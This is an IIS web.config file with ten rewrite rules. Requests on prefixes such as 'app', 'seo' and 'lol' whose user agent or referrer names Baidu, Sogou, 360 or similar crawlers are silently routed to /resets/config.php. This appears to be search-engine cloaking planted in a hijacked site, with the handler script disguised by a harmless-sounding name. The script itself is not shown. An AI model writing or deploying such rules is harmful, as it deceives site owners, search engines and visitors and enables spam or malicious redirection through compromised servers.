<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="rule 1">
          <match url="^app(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 2">
          <match url="^wsp(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 3">
          <match url="^ssp(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 4">
          <match url="^seo(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 5">
          <match url="^tab(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 6">
          <match url="^all(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 7">
          <match url="^lpl(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 8">
          <match url="^lol(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 9">
          <match url="^nes(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
        <rule name="rule 10">
          <match url="^tgb(.*)$" />
          <conditions logicalGrouping="MatchAny">
            <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
            <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|UCBrowser|YisouSpider" />
          </conditions>
          <action type="Rewrite" url="/resets/config.php?{R:1}" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>
